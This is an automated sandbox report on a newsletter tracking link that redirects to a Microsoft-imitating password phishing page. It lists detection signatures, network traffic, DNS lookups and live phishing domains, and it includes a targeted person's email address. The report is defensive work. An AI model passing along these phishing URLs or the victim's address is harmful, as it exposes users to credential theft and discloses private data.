Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://link.mail.beehiiv.com/ls/click?upn=u001.fl7hrKpqiw6rleMq0yETnMUZuFsAAwCeO-2BH5ERPYbcqsWCpxHbnR-2BAMni5gDH0KguWznuzJ8-2BPLnfO8gj2j9yQl2ivfAsJY4Ezg7DDw3zzKfSzxTK3e4dxMSvOfBS7t3jD7uyMdaZpLpYA-2FoIuXpkYxxl3nOzWBw62nOLKDtQmnHprAllAUT7JIYUOdWTCNc6huay-2BA-2FIfT2dnkFc6AmqA-3D-3DxUjQ_ALlq5-2F4R3mneN

Overview

General Information

Sample URL:https://link.mail.beehiiv.com/ls/click?upn=u001.fl7hrKpqiw6rleMq0yETnMUZuFsAAwCeO-2BH5ERPYbcqsWCpxHbnR-2BAMni5gDH0KguWznuzJ8-2BPLnfO8gj2j9yQl2ivfAsJY4Ezg7DDw3zzKfSzxTK3e4dxMSvOfBS7t3jD7uyMdaZpLpYA-2Fo
Analysis ID:1453063
Infos:

Detection

HTMLPhisher
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Phishing site detected (based on favicon image match)
Snort IDS alert for network traffic
Yara detected HtmlPhish54
Yara detected Phisher
Phishing site detected (based on image similarity)
Detected hidden input values containing email addresses (often used in phishing pages)
Detected non-DNS traffic on DNS port
Found iframes
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://link.mail.beehiiv.com/ls/click?upn=u001.fl7hrKpqiw6rleMq0yETnMUZuFsAAwCeO-2BH5ERPYbcqsWCpxHbnR-2BAMni5gDH0KguWznuzJ8-2BPLnfO8gj2j9yQl2ivfAsJY4Ezg7DDw3zzKfSzxTK3e4dxMSvOfBS7t3jD7uyMdaZpLpYA-2FoIuXpkYxxl3nOzWBw62nOLKDtQmnHprAllAUT7JIYUOdWTCNc6huay-2BA-2FIfT2dnkFc6AmqA-3D-3DxUjQ_ALlq5-2F4R3mneNPhLNwp-2FSklL98Rffw61E2phJyJwq6p9ZGyzxGn1cEvL1cS-2FpYXg8QF3LQcVH6N3NvQgDELZv6iF7S8jW1KUDMp8-2BQMtNl9tkzcJNyX8lQ8goJivRSJ1rRDtRrMprAouHGu5blxfALgR7Dy3RcUTkIa9P9fzPowjq9zzgdGTCyOFs7uFwdqBdbRA0dgNynR-2B7yAoxS-2FBqGA-2F5DUOt7N3ksCGSpiDeOafLSSGRb3lCM-2FejLKZB1caBq-2BVS77p19cSK7ce7MMCKsUbNJM3WjT5y2hIW-2BU2KRnVsBRKjayQIu3Eoegvuf-2F4-2BO5eZgRdFML9H6U59SxyK76FhpMNa-2FGiv4uFwsBB2sysmbv0-2Frx-2BnQQJumR5LaNVWmqB2NU4epM800AHR8YJC4DZjZx1FvHMAKtZua35bl6MvjANzHsLEoDCNLFV06pC#bGFpbmkuc2NodWx0ekBnb2FhLm9yZw== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1956,i,10234780614887693068,13232516228769684327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4364 --field-trial-handle=1956,i,10234780614887693068,13232516228769684327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_90JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    SourceRuleDescriptionAuthorStrings
    0.1.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      1.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        0.1.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          1.4.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            0.1.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
              Click to see the 4 entries
              No Sigma rule has matched
              Timestamp:06/06/24-16:13:41.089038
              SID:2857090
              Source Port:443
              Destination Port:49714
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://doxcs.signedfiless.comLLM: Score: 8 brands: Reasons: The domain name 'signedfiless.com' is suspicious and does not match any known legitimate brand. The URL structure and the domain name itself appear to be designed to mimic legitimate services, which is a common social engineering technique used in phishing attacks. Additionally, the webpage displayed in the image is very minimalistic and lacks any identifiable branding or content, which is often a characteristic of phishing sites. DOM: 1.4.pages.csv
              Source: https://doxcs.signedfiless.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'doxcs.signedfiless.com' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The page contains a login form asking for a password, which is a common tactic used in phishing attacks. The domain name appears suspicious and unrelated to Microsoft, indicating a high likelihood of phishing. DOM: 1.5.pages.csv
              Source: https://doxcs.signedfiless.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'doxcs.signedfiless.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a login form on a suspicious domain is a common phishing technique. The domain name appears to be unrelated to Microsoft, which is a strong indicator of a phishing attempt. DOM: 1.6.pages.csv
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueMatcher: Template: microsoft matched with high similarity
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.5.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 1.6.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_90, type: DROPPED
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueMatcher: Found strong image similarity, brand: MICROSOFT
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: laini.schultz@goaa.org
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: Iframe src: https://1c91e9fc-c32a1353.signedfiless.com/Prefetch/Prefetch.aspx
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: Iframe src: https://1c91e9fc-c32a1353.signedfiless.com/Prefetch/Prefetch.aspx
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: Iframe src: https://1c91e9fc-c32a1353.signedfiless.com/Prefetch/Prefetch.aspx
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: Iframe src: https://1c91e9fc-c32a1353.signedfiless.com/Prefetch/Prefetch.aspx
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: Number of links: 0
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.orgHTTP Parser: Base64 decoded: a[href="http://www.salidzini.lv/"][style="display: block; width: 120px; height: 40px; overflow: hidden; position: relative;"]
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: <input type="password" .../> found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.orgHTTP Parser: No favicon
              Source: https://1c91e9fc-c32a1353.signedfiless.com/Prefetch/Prefetch.aspxHTTP Parser: No favicon
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49753 version: TLS 1.2

              Networking

              barindex
              Source: TrafficSnort IDS: 2857090 ETPRO CURRENT_EVENTS JS/PsyduckPockeball Payload Inbound 45.95.169.133:443 -> 192.168.2.16:49714
              Source: global trafficTCP traffic: 192.168.2.16:49759 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.16:49759 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.16:49759 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.16:49759 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.16:49759 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.16:49759 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.16:49759 -> 1.1.1.1:53
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.187
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: global trafficDNS traffic detected: DNS query: link.mail.beehiiv.com
              Source: global trafficDNS traffic detected: DNS query: mwtelhasecologicas.com.br
              Source: global trafficDNS traffic detected: DNS query: doxcs.signedfiless.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: fe63ee9f-c32a1353.signedfiless.com
              Source: global trafficDNS traffic detected: DNS query: 787bf5fe-c32a1353.signedfiless.com
              Source: global trafficDNS traffic detected: DNS query: acf7658e-c32a1353.signedfiless.com
              Source: global trafficDNS traffic detected: DNS query: l1ve.signedfiless.com
              Source: global trafficDNS traffic detected: DNS query: 1c91e9fc-c32a1353.signedfiless.com
              Source: global trafficDNS traffic detected: DNS query: 1e1f038a-c32a1353.signedfiless.com
              Source: global trafficDNS traffic detected: DNS query: cc89e54c-c32a1353.signedfiless.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49753 version: TLS 1.2
              Source: classification engineClassification label: mal84.phis.win@18/24@26/127
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://link.mail.beehiiv.com/ls/click?upn=u001.fl7hrKpqiw6rleMq0yETnMUZuFsAAwCeO-2BH5ERPYbcqsWCpxHbnR-2BAMni5gDH0KguWznuzJ8-2BPLnfO8gj2j9yQl2ivfAsJY4Ezg7DDw3zzKfSzxTK3e4dxMSvOfBS7t3jD7uyMdaZpLpYA-2FoIuXpkYxxl3nOzWBw62nOLKDtQmnHprAllAUT7JIYUOdWTCNc6huay-2BA-2FIfT2dnkFc6AmqA-3D-3DxUjQ_ALlq5-2F4R3mneNPhLNwp-2FSklL98Rffw61E2phJyJwq6p9ZGyzxGn1cEvL1cS-2FpYXg8QF3LQcVH6N3NvQgDELZv6iF7S8jW1KUDMp8-2BQMtNl9tkzcJNyX8lQ8goJivRSJ1rRDtRrMprAouHGu5blxfALgR7Dy3RcUTkIa9P9fzPowjq9zzgdGTCyOFs7uFwdqBdbRA0dgNynR-2B7yAoxS-2FBqGA-2F5DUOt7N3ksCGSpiDeOafLSSGRb3lCM-2FejLKZB1caBq-2BVS77p19cSK7ce7MMCKsUbNJM3WjT5y2hIW-2BU2KRnVsBRKjayQIu3Eoegvuf-2F4-2BO5eZgRdFML9H6U59SxyK76FhpMNa-2FGiv4uFwsBB2sysmbv0-2Frx-2BnQQJumR5LaNVWmqB2NU4epM800AHR8YJC4DZjZx1FvHMAKtZua35bl6MvjANzHsLEoDCNLFV06pC#bGFpbmkuc2NodWx0ekBnb2FhLm9yZw==
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1956,i,10234780614887693068,13232516228769684327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4364 --field-trial-handle=1956,i,10234780614887693068,13232516228769684327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1956,i,10234780614887693068,13232516228769684327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4364 --field-trial-handle=1956,i,10234780614887693068,13232516228769684327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
